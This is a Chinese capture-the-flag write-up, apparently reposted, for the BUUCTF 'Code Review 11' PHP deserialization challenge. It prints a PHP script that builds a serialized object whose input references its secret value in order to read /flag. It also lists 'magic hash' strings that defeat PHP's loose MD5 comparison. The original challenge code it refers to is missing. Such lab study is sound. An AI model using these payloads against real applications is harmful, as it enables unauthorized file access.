当前位置: 首页> 房产> 市场 > BUU CODE REVIEW 11 代码审计之反序列化知识

BUU CODE REVIEW 11 代码审计之反序列化知识

时间:2025/7/21 12:15:08来源:https://blog.csdn.net/weixin_42515203/article/details/139813763 浏览次数:0次

打开靶场,得到的是一段代码。

通过分析上面代码可以构造下面代码,获取到序列化之后的obj。

<?php
class BUU {public $correct = "";public $input = "";public function __destruct() {try {$this->correct = base64_encode(uniqid());if($this->correct === $this->input) {echo file_get_contents("/flag");}} catch (Exception $e) {}}
}
$a=new BUU();
$a->input=&$a->correct;
echo serialize($a);
?>

然后再使用hackbar 插件将post数据传入到,运行代码获取flag。

1.hackbar(浏览器的一款插件)的下载安装

2.按F12调出插件,添加参数,从源码分析得出传的两个参数必须是不一样,但是md5加密之后得到的又得一样,这样的值有很多,例如下面的这些:

QNKCDZO、s878926199a、s155964671a、s214587387a、s214587387a.......

至于为什们相同,因为上面的字符串进过md5加密之后,开头都是0e,这是一种科学计算的方式,被当作0x10的多少次方,得到的结果都是0。

3.获取最后的flag

4.提交flags

关键字:BUU CODE REVIEW 11 代码审计之反序列化知识

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: